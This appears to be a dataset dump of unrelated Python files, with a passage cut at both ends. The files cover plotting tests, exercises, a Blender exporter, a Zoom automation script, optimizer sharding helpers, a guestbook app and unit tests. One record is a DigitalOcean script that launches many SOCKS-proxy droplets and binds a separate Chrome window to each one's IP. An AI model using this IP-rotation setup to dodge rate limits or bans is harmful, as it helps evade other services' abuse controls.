        vBox.Add(self.CreateBottomWindow(panel), 0, wx.EXPAND)
        panel.SetSizerAndFit(vBox)

    # Log callback
    def OnLogCallback(self, message):
        # Child frames funnel their log text here.
        self.loggerWindow.AppendText(message)
21,584 | c37aba9cfe8da27ed882a948773aeed370524ea2 | from helpers import assert_equality
def plot():
    """Build a gouraud-shaded pcolormesh of z = x**2 - y**2 on [0, 1]^2."""
    import matplotlib.cm as cm
    import matplotlib.pyplot as plt
    import numpy as np

    axis = np.linspace(0, 1)
    x, y = np.meshgrid(axis, axis)
    fig = plt.figure()
    plt.pcolormesh(x, y, x ** 2 - y ** 2, cmap=cm.viridis, shading="gouraud")
    return fig
def test():
    # Render the figure and compare it against the stored ConTeXt (.tex)
    # reference file that lives next to this test module.
    assert_equality(plot, __file__[:-3] + "_reference.tex", flavor="context")
    return
|
21,585 | b09ce47a6fb5ab88eddc2be33a90ca7c51dfdc79 | # Challenge: https://www.hackerrank.com/challenges/python-print/problem?h_r=next-challenge&h_v=zen
# Read N and print the integers 1..N concatenated without separators
# (e.g. N=3 prints "123"), as the challenge requires.
num = int(input())
for i in range(1, num + 1):
    print(i, end="")
21,586 | de096d77104d5f67af00aa3592d5f2517f01ccf5 | #-*- coding:utf-8 -*-
#!Author:YunFei Zhang
'''
定义
关键字 函数名(参数):
"文档描述"
过程
返回值
'''
#函数
'''
def func1():
"""testing1"""
return 0
'''
#过程
'''
def func2():
"""testing2"""
print("in the func2")
'''
'''
递归定义:在函数内部,可以调用其他函数。如果一个函数在内部调用自身,这个函数就是递归函数。
特性:1、必须要有一个明确的结束条件。
2、每次进入更深一层递归时,问题规模相比上次递归都应该有所减少
3、递归效率不高,递归层次过多会导致栈溢出(计算机中,函数调用时通过栈这种数据结构实现的,每当一如一个函数调用,
栈就会加一层栈帧。每当函数返回,栈就会减一层栈帧。由于栈的大小不是无限的,所以,递归调用的次数过多,会导致栈溢
出。)
'''
'''
def clac(n):
print(n)
if int(n/2) > 0:
return clac(int(n / 2))
clac(10)
'''
#高阶函数:变量可以指向函数,函数的参数能接受变量,那么一个函数就可以接受另一个函数作为参数,这种函数就称之为高阶函数
def add(a, b, f):
    """Higher-order helper: apply f to each operand and sum the results."""
    left = f(a)
    right = f(b)
    return left + right


print(add(3, -6, abs))  # abs is a builtin: |3| + |-6| == 9
21,587 | 3b227bdf54355e337939a98dab3fb8574798a697 | #!/usr/bin/python3
"""Module that reads stdin line by line and print metrics"""
import sys
if __name__ == "__main__":
    # Per-status-code counters for the codes we track.
    stat = {"200": 0, "301": 0, "400": 0, "401": 0,
            "403": 0, "404": 0, "405": 0, "500": 0}
    ctr = 0          # lines seen since the last 10-line report
    total_size = 0   # running sum of all response sizes
    try:
        for line in sys.stdin:
            # Assumes the request is quoted, followed by "<status> <size>"
            # — TODO confirm the exact log format against the producer.
            status_code = line.split('"')[2].split(" ")[1]
            size = int(line.split('"')[2].split(" ")[2])
            total_size += size
            ctr += 1
            for key in sorted(stat.keys()):
                if status_code == key:
                    stat[key] += 1
            # Emit intermediate metrics after every 10th parsed line.
            if ctr == 10:
                print("File size: {:d}".format(total_size))
                for key in sorted(stat.keys()):
                    if stat[key]:
                        print("{}: {:d}".format(key, stat[key]))
                ctr = 0
    except KeyboardInterrupt:
        pass
    finally:
        # Final report on EOF or Ctrl-C; only non-zero codes are shown.
        print("File size: {:d}".format(total_size))
        for key in sorted(stat.keys()):
            if stat[key]:
                print("{}: {:d}".format(key, stat[key]))
|
21,588 | 642caf099e41e964cf15caa418d4da50cd7beabc | import sys
from io import StringIO
import threading
import time
from code import InteractiveInterpreter
def execute(interpreter: InteractiveInterpreter, code):
    """Run `code` on `interpreter`, capturing its stdout and stderr.

    Returns a dict {'output': ..., 'error': ...} holding whatever the
    code wrote to stdout and stderr respectively.  The original streams
    are always restored, even if runcode itself raises.
    """
    old_stdout, old_stderr = sys.stdout, sys.stderr
    redirected_output = sys.stdout = StringIO()
    redirected_error = sys.stderr = StringIO()
    try:
        interpreter.runcode(code)
    finally:
        # BUG FIX: stderr was previously restored to old_stdout,
        # permanently clobbering sys.stderr after the first call.
        sys.stdout, sys.stderr = old_stdout, old_stderr
    return {'output': redirected_output.getvalue(), 'error': redirected_error.getvalue()}
# Registry of Client worker threads (populated elsewhere; presumably
# keyed by client id — verify against the caller).
clients = {}
class Client(threading.Thread):
    """Worker thread owning one InteractiveInterpreter session.

    Code snippets are pushed onto `queue`; the run loop executes them in
    order via execute() and appends the captured output dicts to
    `result`.  close_client() asks the loop to exit.
    """

    def __init__(self, queue: list, id):
        super().__init__()
        self.id = id
        self.queue = queue    # pending code snippets, FIFO
        self.result = []      # execute() result dicts, in push order
        # Seed the interpreter namespace with a copy of this module's
        # globals/locals so pushed code can reference them.
        variables = globals().copy()
        variables.update(locals())
        self.interpreter = InteractiveInterpreter(variables)
        self.stop = False     # set by close_client() to end run()
        self.loading = False  # True while a snippet is executing

    def run(self):
        # Make pushed code behave like a script entry point.
        self.interpreter.runcode("__name__ = '__main__'")
        while True:
            while len(self.queue) > 0:
                self.loading = True
                code = self.queue.pop(0)
                self.result.append(execute(self.interpreter, code))
                self.loading = False
            time.sleep(1)  # idle poll; stop flag is checked once per second
            if self.stop:
                break

    def push_code(self, code):
        # Queue a snippet for execution by the worker loop.
        self.queue.append(code)

    def get_result(self):
        # NOTE(review): busy-waits without sleeping until a result
        # appears, and blocks forever if nothing was pushed.
        while len(self.result) <= 0:
            pass
        result = self.result.pop(0)
        return result

    def close_client(self):
        # Ask the run loop to exit after its current idle cycle.
        self.stop = True
class IDError(Exception):
    """Raised when a client id is invalid or unknown."""

    def __init__(self, error):
        # Pass the message to Exception: the original called
        # super().__init__(self), which put the exception object itself
        # into self.args instead of the message.
        super().__init__(error)
        self.error = error

    def __repr__(self):
        return self.error

    def __str__(self):
        return self.error
|
21,589 | 70c5628ba9e2ce88de3d4b83dfc809e27a4bd237 | import math
from collections import Counter
def entropy(class_probabilities):
    """Shannon entropy (in bits) of a list of class probabilities.

    Zero probabilities are skipped so log(0) is never evaluated.
    """
    total = 0
    for p in class_probabilities:
        if p:
            total += -p * math.log(p, 2)
    return total
# DATA WILL COME IN THE FORM (input, label)
def class_probabilities(labels):
    """Fraction of `labels` belonging to each distinct class.

    Order follows Counter insertion order (first appearance in labels).
    """
    total_count = len(labels)
    counts = Counter(labels)
    return [n / total_count for n in counts.values()]
def data_entropy(labeled_data):
    """Entropy of the labels in a list of (input, label) pairs."""
    probabilities = class_probabilities([label for _, label in labeled_data])
    return entropy(probabilities)
def partition_entropy(subsets):  # subsets is a list of lists
    """Entropy of a partition: size-weighted average of subset entropies."""
    total_count = sum(len(subset) for subset in subsets)
    weighted = 0
    for subset in subsets:
        weighted += data_entropy(subset) * len(subset) / total_count
    return weighted
|
21,590 | 43084d5b0f7d1ec4f78fa5336bd39128909b9e1c | import networkx as nx
'''
Joints
------
0: BODY_COXA, :15
1: COXA_FEMUR, :16
2: FEMUR_TIBIA, :17
3: TIBIA_TARSUS, :18
4: TARSUS_TIP, :19
5: BODY_COXA, :20
6: COXA_FEMUR, :21
7: FEMUR_TIBIA, :22
8: TIBIA_TARSUS, :23
9: TARSUS_TIP, :24
10: BODY_COXA, :25
11: COXA_FEMUR, :26
12: FEMUR_TIBIA, :27
13: TIBIA_TARSUS, :28
14: TARSUS_TIP, :29
'''
def skeleton():
    """Fly-limb skeleton as a networkx graph.

    Returns (G, edge_colors): G has 30 joint nodes (5 joints per leg,
    6 legs) with each leg's joints chained into 4 edges; edge_colors
    holds RGB triples (0-1 floats) coloured by limb.
    """
    edges = [(0,1),(1,2),(2,3),(3,4),
             (5,6),(6,7),(7,8),(8,9),
             (10,11),(11,12),(12,13),(13,14),
             (15,16),(16,17),(17,18),(18,19),
             (20,21),(21,22),(22,23),(23,24),
             (25,26),(26,27),(27,28),(28,29)]
    #0: LF, 1: LM, 2: LH, 3: RF, 4: RM, 5: RH,
    limb_id = [i for i in range(6) for j in range(5)]
    nodes = [i for i in range(30)]
    colors = [[186,30,49], [201,86,79], [213,133,121], #RF, RM, RH
              [15,115, 153], [26,141, 175], [117,190,203] #LF, LM, LH
             ]
    # NOTE(review): limb_id has 30 entries (one per node) while there
    # are 24 edges, so edge_colors has 30 entries — presumably consumers
    # zip it against edges and ignore the excess; verify at the caller.
    edge_colors = [[x / 255.0 for x in colors[i]] for i in limb_id]
    #build graph
    G=nx.Graph()
    G.add_edges_from(edges)
    G.add_nodes_from(nodes)
    return G, edge_colors
21,591 | 6be91a455a2f5d9bdd18c68b3e396bda1efefe15 | bl_info = {
"name": "Animation Markers Exporter For Urho3D",
"author": "codingmonkey",
"category": "Object",
"blender": (2, 73, 1)
}
import bpy
import os
import struct
import sys
import mathutils
from math import radians
from bpy.props import (BoolProperty)
class MarkersExporter(bpy.types.Operator):
    """Export Blender markers as Urho3D animation-trigger XML files.

    Writes one <action name>.xml per action with pose markers, plus one
    <scene name>_global_markers.xml for the scene timeline markers.
    """

    bl_idname = "object.markersexporter" # unique identifier for buttons and menu items to reference.
    bl_label = "Urho3D Markers Create" # display name in the interface.
    bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.

    # When True, trigger times are written as a 0..1 fraction of the
    # action/scene length instead of seconds.
    normalizeMarkers = BoolProperty( name="Normalize markers", description="Normalize markers", default=False )

    def SaveLocalActionMarkes(self, context):
        # Write an XML trigger file per action that has pose markers.
        print ("Actions count:", len(bpy.data.actions));
        fps = context.scene.render.fps
        print ("render fps:{0}".format(fps))
        for i, action in enumerate(bpy.data.actions):
            print ("index: {0} action name: {1} have {2} markers".format(i, action.name, len(action.pose_markers)))
            print ("frame range {0} to {1}".format(action.frame_range[0], action.frame_range[1]))
            print ("action len {0}".format(action.frame_range[1] - action.frame_range[0]))
            startFrame = action.frame_range[0]
            endFrame = action.frame_range[1]
            lenAction = endFrame - startFrame
            isThisActionHasMarkers = len(action.pose_markers)
            if (isThisActionHasMarkers):
                # markers write
                file = open(action.name + ".xml", 'wt')
                file.write("<animation>\n")
                for i, marker in enumerate(action.pose_markers):
                    if (self.normalizeMarkers == False):
                        # Seconds: frame number divided by the render fps.
                        print ("marker index: {0} frame: {1} name: {2}".format(i, marker.frame, marker.name))
                        file.write(' <trigger time="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / fps, marker.name))
                    else:
                        # Normalized: fraction of the action's frame range.
                        print ("marker index: {0} normalizedtime: {1} name: {2}".format(i, marker.frame / lenAction, marker.name))
                        file.write(' <trigger normalizedtime="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / lenAction, marker.name))
                file.write("</animation>")
                file.close()

    def SaveGlobalSceneMarkers(self, context):
        # Write the scene's timeline markers to a single global XML file.
        isSceneHasMarkers = len(context.scene.timeline_markers)
        scene = context.scene
        fps = scene.render.fps
        lenScene = scene.frame_end
        if (isSceneHasMarkers):
            file = open(scene.name + "_global_markers.xml", 'wt')
            file.write("<animation>\n")
            for i, marker in enumerate(scene.timeline_markers):
                if (self.normalizeMarkers == False):
                    file.write(' <trigger time="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / fps, marker.name))
                else:
                    file.write(' <trigger normalizedtime="{0:.2f}" type="String" value="{1}" />\n'.format(marker.frame / lenScene, marker.name))
            file.write("</animation>")
            file.close()

    def execute(self, context):
        # Operator entry point invoked by Blender.
        self.SaveLocalActionMarkes(context)
        self.SaveGlobalSceneMarkers(context)
        return {'FINISHED'}
def menu_func(self, context):
    # Adds the export operator to the 3D View "Object" menu.
    self.layout.operator(MarkersExporter.bl_idname)


def register():
    # Called by Blender when the add-on is enabled.
    bpy.utils.register_class(MarkersExporter)
    bpy.types.VIEW3D_MT_object.append(menu_func)


def unregister():
    # Called by Blender when the add-on is disabled.
    # NOTE(review): menu_func is never removed from VIEW3D_MT_object here.
    bpy.utils.unregister_class(MarkersExporter)
21,592 | 8d2eea677bc8d36184d7892e81acccabb6717c02 | from django.contrib.auth import views as auth_views
from django.urls import path, re_path
from . import views
app_name = 'chinesseRestaurant'

# Route table for the restaurant app; login/logout use the stock
# django.contrib.auth class-based views.
urlpatterns = [
    path('', views.covidWarning, name='covidWarning'),
    re_path('home/', views.home, name='home'),
    path('customerView/', views.customerView, name='customerView'),
    # path('signup/', views.signup, name='signup'),
    path('register/', views.register, name='register'),
    path('login/', auth_views.LoginView.as_view(), name='user_login'),
    path('logout/', auth_views.LogoutView.as_view(), name='logout'),
    path('foods/', views.item_list, name='item_list'),
    # Same list view, filtered by a category slug.
    path('foods/<slug:category_slug>/', views.item_list,
         name='item_list'),
    path('orderNow/', views.order_now, name='order_now'),
    path('menu/', views.menu, name='menu'),
    path('edit/', views.edit, name='edit'),
    path('edit_delivery', views.editDeliveryPref, name="editDeliveryPref"),
]
|
21,593 | 9e677a0b1c0352e7adf3a364d8785bc1db8d765f | """
Automatic Zoom Hosting
Raymond Hernandez
December 25, 2020
"""
import os
import cv2
import pyautogui
import time
import schedule
import sys
from gui import *
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
# TODO: Make this list imported from a file
# Parallel lists: meeting_ID[i] pairs with password[i]; `index` selects
# which pair join_meetings_schedule uses.
meeting_ID = ["test_ID", "82807141026"]
password = ["test_pass", "120628"]
index = 0
class GUI(QtWidgets.QMainWindow, Ui_MainWindow):
    """Qt main window wiring the two start buttons to the schedulers.

    NOTE(review): both handlers call blocking scheduler loops directly
    on the UI thread, so the label text may never get repainted.
    """

    def __init__(self, parent=None):
        super(GUI, self).__init__(parent)
        self.setupUi(self)
        self.start_host.clicked.connect(self.start_auto_host)
        self.start_join.clicked.connect(self.start_auto_join)

    def start_auto_host(self):
        self.label_3.setText("Auto-host mode started...")
        new_meetings_schedule()

    def start_auto_join(self):
        self.label_3.setText("Auto-join mode started...")
        join_meetings_schedule()
class AutoZoom:
    """Drives the Zoom desktop client via pyautogui screen automation.

    Buttons are located by template-matching screenshot PNGs in the
    working directory.  A meeting is ended after `duration` minutes by
    killing the Zoom process.  (Decomposed from two near-duplicate
    methods: the launch, click-button and end-meeting sequences were
    repeated inline; behavior is unchanged.)
    """

    def __init__(self, ID=None, passcode=None, duration=None):
        self.duration = duration  # meeting length, in minutes
        self.meeting_ID = ID      # used only by join_meeting
        self.password = passcode  # used only by join_meeting

    def _launch_zoom(self):
        # Open the Start menu, type "zoom" and launch the client.
        time.sleep(0.2)
        pyautogui.press('esc', interval=0.1)
        time.sleep(0.3)
        pyautogui.press('win', interval=0.5)
        pyautogui.write('zoom')
        time.sleep(1)
        pyautogui.press('enter', interval=0.5)
        time.sleep(1)

    def _click_button(self, image_file, interval):
        # Locate the button on screen by template matching, click it,
        # then press Enter with the given key interval.
        img = cv2.imread(image_file)
        x, y = pyautogui.locateCenterOnScreen(img, confidence=0.9)
        pyautogui.click(x, y)
        pyautogui.press('enter', interval=interval)

    def _end_meeting(self):
        # Let the meeting run for `duration` minutes, then kill Zoom.
        time.sleep(self.duration * 60)
        os.system("TASKKILL /F /IM Zoom.exe")
        time.sleep(0.5)

    def start_meeting(self):
        """Host a new meeting: disable the waiting room and mute everyone."""
        self._launch_zoom()
        self._click_button(r"button_new_meeting.PNG", 10)
        self._click_button(r"button_participants.PNG", 2)
        self._click_button(r"button_more_options.PNG", 2)
        self._click_button(r"button_waiting_room.PNG", .5)
        self._click_button(r"button_more_options.PNG", .5)
        self._click_button(r"button_mute_all.PNG", .5)
        self._end_meeting()

    def join_meeting(self):
        """Join an existing meeting using self.meeting_ID / self.password."""
        self._launch_zoom()
        self._click_button(r"button_join.PNG", 2)
        pyautogui.write(self.meeting_ID)
        pyautogui.press('enter', interval=2)
        pyautogui.write(self.password)
        pyautogui.press('enter', interval=2)
        self._end_meeting()
def new_meetings_schedule():
    """Host meetings: run one immediately, then on the weekly schedule.

    Never returns — ends in an infinite polling loop.
    """
    zoom = AutoZoom(duration=200)
    """" Enable this to test """
    zoom.start_meeting()
    """ Real schedule here... """
    schedule.every().tuesday.at("09:00").do(zoom.start_meeting)
    schedule.every().wednesday.at("09:00").do(zoom.start_meeting)
    schedule.every().thursday.at("09:00").do(zoom.start_meeting)
    schedule.every().sunday.at("09:00").do(zoom.start_meeting)
    while True:
        schedule.run_pending()
        time.sleep(1)
def join_meetings_schedule():
    """Join meetings: run one immediately, then on the weekly schedule.

    Uses the module-level meeting_ID/password pair selected by `index`.
    Never returns — ends in an infinite polling loop.
    """
    zoom = AutoZoom(ID=meeting_ID[index], passcode=password[index], duration=140)
    """ Enable this to test or when using in GUI """
    zoom.join_meeting()
    """ Real schedule here... """
    schedule.every().friday.at("18:30").do(zoom.join_meeting)
    schedule.every().saturday.at("09:30").do(zoom.join_meeting)
    schedule.every().sunday.at("15:30").do(zoom.join_meeting)
    while True:
        schedule.run_pending()
        time.sleep(1)
def main():
    # Runs auto-join mode headless; the GUI startup below is disabled.
    # new_meetings_schedule()
    join_meetings_schedule()
    # app = QApplication(sys.argv)
    # form = GUI()
    # form.show()
    # app.exec_()


if __name__ == "__main__":
    main()
|
21,594 | 376b64aa60b4c79801ad79c7fdcdc97dc782ad20 | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
""" Optimizer related helpers. """
from copy import deepcopy
from dataclasses import replace
from itertools import chain
from typing import Dict, List, Iterable
import torch
from .mapping import StateDict, ShardedStateDict, ShardedTensor, \
LocalNonpersitentObject
from .dict_utils import nested_values
def get_optim_param_to_id_map(optim_params_iter: Iterable[torch.nn.Parameter]) -> Dict[int, int]:
    """Map id(param) -> ordinal position in the iterable.

    Only the first occurrence of each parameter is recorded.
    """
    param_mappings = {}
    for position, parameter in enumerate(optim_params_iter):
        param_mappings.setdefault(id(parameter), position)
    return param_mappings
def get_param_id_to_sharded_param_map(model_sharded_state_dict: ShardedStateDict,
                                      optim_params_iter: Iterable[torch.nn.Parameter]) -> Dict[int, ShardedTensor]:
    """Map optimizer param ordinal id -> the ShardedTensor wrapping it.

    Sharded tensors whose underlying data is not among the optimizer
    parameters are skipped.
    """
    param_to_id_map = get_optim_param_to_id_map(optim_params_iter)
    id_to_sharded_param_map = {}
    for sharded_ten in nested_values(model_sharded_state_dict):
        param_id = param_to_id_map.get(id(sharded_ten.data))
        if param_id is not None:
            id_to_sharded_param_map[param_id] = sharded_ten
    return id_to_sharded_param_map
def make_sharded_optimizer_tensor(model_param: ShardedTensor, optim_param: torch.Tensor, prefix: str) -> ShardedTensor:
    """Clone the model param's sharding metadata onto an optimizer tensor.

    The result reuses model_param's sharding info but carries the
    optimizer tensor's data/dtype and a prefixed key.
    """
    optim_shape = tuple(optim_param.shape)
    assert optim_shape == model_param.local_shape, \
        f'Optimizer shape ({tuple(optim_param.shape)} does not match model shape ({model_param.local_shape})'
    new_key = f'{prefix}.{model_param.key}'
    return replace(model_param, key=new_key, data=optim_param, dtype=optim_param.dtype)
def optim_state_to_sharding_state(optim_state_dict: StateDict, id_to_sharded_param_map: Dict[int, ShardedTensor]):
    """Convert a torch optimizer state_dict to a sharded state dict, in place.

    Every per-param state tensor is wrapped as a ShardedTensor keyed
    'optimizer.state.<state_key>.<model key>'; 'param_groups' is
    deep-copied and each group's 'params' list wrapped so it is kept
    locally rather than persisted.

    Raises:
        ValueError: if a param id has no entry in id_to_sharded_param_map.
    """
    sharded_state = {}
    for param_id, param_state in optim_state_dict['state'].items():
        sharded_state[param_id] = {}
        for state_key, param in param_state.items():
            if param_id in id_to_sharded_param_map:
                sharded_state[param_id][state_key] = make_sharded_optimizer_tensor(
                    id_to_sharded_param_map[param_id], param,
                    prefix=f'optimizer.state.{state_key}')
            else:
                raise ValueError(
                    f'Param id {param_id} does not match any model sharded param')
    # Deep-copy so wrapping 'params' does not mutate the live optimizer.
    optim_state_dict['param_groups'] = deepcopy(optim_state_dict['param_groups'])
    for group in optim_state_dict['param_groups']:
        group['params'] = LocalNonpersitentObject(group['params'])
    optim_state_dict['state'] = sharded_state
|
21,595 | ca4b81a0f97de53dfe0414249c2205b55e90b8c7 | import cgi
import datetime
import logging
import StringIO
import time
from google.appengine.ext import db
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import memcache
from google.appengine.api import images
logging.getLogger().setLevel(logging.DEBUG)
class Greeting(db.Model):
    """Datastore entity for one guestbook entry."""
    author = db.UserProperty()                     # signed-in author, if any
    content = db.StringProperty(multiline=True)    # message text
    avatar = db.BlobProperty()                     # avatar image bytes (resized on upload)
    date = db.DateTimeProperty(auto_now_add=True)  # set automatically on first put()
class MainPage(webapp.RequestHandler):
    """Front page: shows the cached greetings plus the signing form."""

    def get(self):
        self.response.out.write("<html><body>")
        # Time the (possibly cached) greetings fetch and surface
        # memcache hit/miss statistics for demonstration.
        before = time.time()
        greetings = self.get_greetings()
        after = time.time()
        timeTaken = str(after - before)
        stats = memcache.get_stats()
        self.response.out.write("<b>Time to get Greetings:%s seconds</b><br>" % timeTaken)
        self.response.out.write("<b>Cache Hits:%s</b><br>" % stats['hits'])
        self.response.out.write("<b>Cache Misses:%s</b><br><br>" %
                                stats['misses'])
        self.response.out.write(greetings)
        self.response.out.write("""
          <form action="/sign" enctype="multipart/form-data" method="post">
            <div><label>Message:</label></div>
            <div><textarea name="content" rows="3" cols="60"></textarea></div>
            <div><label>Avatar:</label></div>
            <div><input type="file" name="img"/></div>
            <div><input type="submit" value="Sign Guestbook"></div>
          </form>
        </body>
      </html>""")

    def get_greetings(self):
        """
        get_greetings()
        Checks the cache to see if there are cached greetings.
        If not, call render_greetings and set the cache
        Returns:
            A string of HTML containing greetings.
        """
        greetings = memcache.get("greetings")
        if greetings is not None:
            return greetings
        else:
            greetings = self.render_greetings()
            # Cache for 10 seconds; add() is a no-op if the key exists.
            if not memcache.add("greetings", greetings, 10):
                logging.error("Memcache set failed.")
            return greetings

    def render_greetings(self):
        """
        render_greetings()
        Queries the database for greetings, iterate through the
        results and create the HTML.
        Returns:
            A string of HTML containing greetings
        """
        results = db.GqlQuery("SELECT * "
                              "FROM Greeting "
                              "ORDER BY date DESC").fetch(10)
        output = StringIO.StringIO()
        for result in results:
            if result.author:
                output.write("<b>%s</b> wrote:" % result.author.nickname())
            else:
                output.write("An anonymous person wrote:")
            # Each greeting embeds its avatar through the /img handler.
            output.write("<div><img src='img?img_id=%s'></img>" %
                         result.key())
            output.write(' %s</div>' % cgi.escape(result.content))
        return output.getvalue()
class Image (webapp.RequestHandler):
    """Serves a greeting's avatar blob; img_id is the entity key."""

    def get(self):
        greeting = db.get(self.request.get("img_id"))
        if greeting.avatar:
            self.response.headers['Content-Type'] = "image/png"
            self.response.out.write(greeting.avatar)
        else:
            self.response.out.write("No image")
class Guestbook(webapp.RequestHandler):
    """Handles the signing form POST: store a greeting, redirect home."""

    def post(self):
        greeting = Greeting()
        if users.get_current_user():
            greeting.author = users.get_current_user()
        greeting.content = self.request.get('content')
        if self.request.get("img"):
            # Normalise uploaded avatars to 32x32 before storing.
            avatar = images.resize(self.request.get("img"), 32, 32)
            greeting.avatar = db.Blob(avatar)
        greeting.put()
        self.redirect('/')
# URL routing for the WSGI application.
application = webapp.WSGIApplication([
    ('/', MainPage),
    ('/img', Image),
    ('/sign', Guestbook)
], debug=True)
def main():
    # Entry point used by the App Engine Python runtime.
    run_wsgi_app(application)


if __name__ == '__main__':
    main()
|
21,596 | ec45b39ff09433164cab8a11a0bf8885e3740490 | #!/usr/bin/python
import urllib2
import json
import sys
import time
import subprocess
import os
import binascii
# Launches specified number of Digital Ocean droplets and binds one Chrome instance to each droplet,
# resulting in any number of separate windows (up to a reasonable limit) with different IPs.
# Requires a corresponding image on your DO account that starts a SOCKS proxy on boot (the script
# assumes this). Please do not use for anything malicious or illegal, this was made for testing a
# P2P messaging application.
if len(sys.argv) < 2:
print "\tPlease specify a number of proxies to launch:"
print "\t./launch #"
print "\t Exiting."
exit(1)
droplets = int(sys.argv[1])
client_id = "YOUR ID"
api_key = "YOUR KEY"
print "DigitalOcean Client ID: " + client_id
print "DigitalOcean API key: " + api_key
image_id = "YOUR IMAGE ID"
size_id = "66"
sshkey_id = "YOUR SSH KEY ID"
region_slug = "nyc2"
# Create a random group ID so that we can launch multiple groups of droplets
group = binascii.b2a_hex(os.urandom(8))
for x in range(1,droplets+1):
name = "P" + str(x) + "x" + group
api_string = ("https://api.digitalocean.com/droplets/new?" +
"client_id={0}&api_key={1}&name={2}&size_id={3}&image_id={4}®ion_slug={5}&ssh_key_ids={6}"
.format(client_id, api_key, name, size_id, image_id, region_slug, sshkey_id))
launch = urllib2.urlopen(api_string)
response = json.load(launch)
print "Sent request for proxy " + str(x) + "... " + response['status']
if response['status'] == "ERROR":
print "Uh oh, something went wrong. Printing response from API and exiting."
print response
exit(1)
# Wait between GETs to prevent rate limiting
time.sleep(3)
print "Now waiting for all proxies to finish booting. This will take 3 minutes."
time.sleep(60)
print "120 seconds left..."
time.sleep(60)
print "60 seconds left..."
time.sleep(60)
print "All proxies should now be initialized."
api_string = "https://api.digitalocean.com/droplets/?client_id={0}&api_key={1}".format(client_id, api_key)
check = urllib2.urlopen(api_string)
response = json.load(check)
print "Group ID for this machine: " + group
for droplet in response['droplets']:
print droplet['name'] + ": " + droplet['ip_address'] + " " + droplet['status']
# For this next step, the private key with correct permissions must be in home dir
# And host checking should be turned off in ssh config
# And the image should auto-start port forwarding on 1080
print "Now opening windows!"
instance = 1
url = "http://whatsmyip.us"
window = "-n"
directory = "--user-data-dir=/your/path/to/chrome/cacher"
executable = "/your/path/to/chrome"
for droplet in response['droplets']:
if group in droplet['name']:
server = "--proxy-server=socks://" + droplet['ip_address']
subprocess.Popen([executable, url, window, directory + str(instance), server])
time.sleep(5)
instance += 1
|
21,597 | f4786a6721ae18a65695ead4befa326c756fd490 | import os
import json
import unittest
from unittest import mock
from unittest.mock import ANY
import logging
from logging import handlers, LogRecord
from typing import Tuple, Optional, Dict
from tests.util.config_mixin import ConfigMixin
from backee.model.web_handler import WebHandler
from backee.model.max_level_filter import MaxLevelFilter
from backee.parser.config_parser import parse_config
class LoggersParserTestCase(ConfigMixin, unittest.TestCase):
    """
    Tests for `backee/parser/logger_parser.py`.

    NOTE(review): indentation of this file was lost in transit; the class
    structure below is reconstructed.  One real bug was fixed in
    __compare_file_loggers (the second argument's type was never checked).
    """

    @unittest.mock.patch("os.mkdir")
    def test_file_logger_all_values_parsed(self, mkdir):
        """
        All possible values for file logger are set and parsed correctly.
        """
        expected_file_logger = self.__create_file_logger(
            filename="/folder/log_file1",
            format="('%(asctime)s [%(threadName)18s][%(levelname)8s] %(message)s')",
            max_bytes=1024,
            backup_count=1,
            min_level=logging.INFO,
            max_level=logging.ERROR,
        )

        # parse config and get first logger
        parsed_config = self._get_parsed_config("file_loggers_config.yml")
        parsed_file_logger = parsed_config.loggers[0]

        # make sure the log directory was created
        mkdir.assert_called_with("/folder")

        result, msg = self.__compare_file_loggers(
            expected_file_logger, parsed_file_logger
        )
        self.assertTrue(
            result,
            msg=f"Full config is not as expected, following comparison failed: {msg}",
        )

    @unittest.mock.patch("os.mkdir")
    def test_file_logger_default_values(self, mkdir):
        """
        Only required values are set and others are default.
        """
        expected_file_logger = self.__create_file_logger(
            filename="/folder/log_file2",
            format="('%(asctime)s %(levelname)s %(message)s')",
            max_bytes=1 * 1024 * 1024,
            backup_count=0,
            min_level=logging.DEBUG,
            max_level=logging.CRITICAL,
        )

        # parse config and get logger
        parsed_config = self._get_parsed_config("file_loggers_config.yml")
        parsed_file_logger = parsed_config.loggers[1]

        # make sure the log directory was created
        mkdir.assert_called_with("/folder")

        result, msg = self.__compare_file_loggers(
            expected_file_logger, parsed_file_logger
        )
        self.assertTrue(
            result,
            msg=f"Default config is not as expected, following comparison failed: {msg}",
        )

    def test_web_logger_all_values_parsed(self):
        """
        All possible values for web logger are set and parsed correctly.
        """
        expected_web_logger = self.__create_web_handler(
            method="POST",
            url="https://some/url1",
            headers={"Content-Type": "application/json", "TestHeader1": "Value1"},
            body='{"message":"message 1"}',
            auth={
                "type": "basic",
                "username": "admin",
                "password": "${WEB_LOGGER_PASSWORD}",
            },
            min_level=logging.INFO,
            max_level=logging.ERROR,
        )

        # parse config and get logger
        parsed_config = self._get_parsed_config("full_config.yml")
        parsed_web_logger = parsed_config.loggers[0]

        self.assertEqual(
            expected_web_logger,
            parsed_web_logger,
            msg="full web logger is parsed incorrectly",
        )

    def test_web_logger_default_values(self):
        """
        Only required values are set and others are default.
        """
        expected_web_logger = self.__create_web_handler(
            method="POST", url="https://some/url2", body='{"message":"message 2"}'
        )

        # parse config and get logger
        parsed_config = self._get_parsed_config("default_config.yml")
        parsed_web_logger = parsed_config.loggers[0]

        self.assertEqual(
            expected_web_logger,
            parsed_web_logger,
            msg="default web logger is parsed incorrectly",
        )

    @unittest.mock.patch("requests.post")
    def test_web_logger_wildcard_replacements_in_post(self, mock_post):
        """
        Test that {{ message }} and {{ name }} are replaced in url, headers and body for POST.
        """
        parsed_config = self._get_parsed_config("full_config.yml")
        parsed_web_logger = parsed_config.loggers[1]
        message = "test"
        name = parsed_config.name

        parsed_web_logger.emit(
            LogRecord(
                name=None,
                level=logging.ERROR,
                pathname=None,
                lineno=None,
                msg=message,
                args=None,
                exc_info=None,
            )
        )

        # headers, data and URL are updated
        data = json.dumps(json.loads(f'{{"message":"{message}","name":"{name}"}}'))
        mock_post.assert_called_once_with(
            auth=ANY,
            data=data,
            headers={
                "Content-Type": "application/json",
                "TestHeader2": f"{name} {message}",
            },
            url=f"https://some/url2?name={name}&message={message}",
        )

    @unittest.mock.patch("requests.get")
    def test_web_logger_wildcard_replacements_in_get(self, mock_get):
        """
        Test that {{ message }} is replaced in url, headers and body for GET.
        """
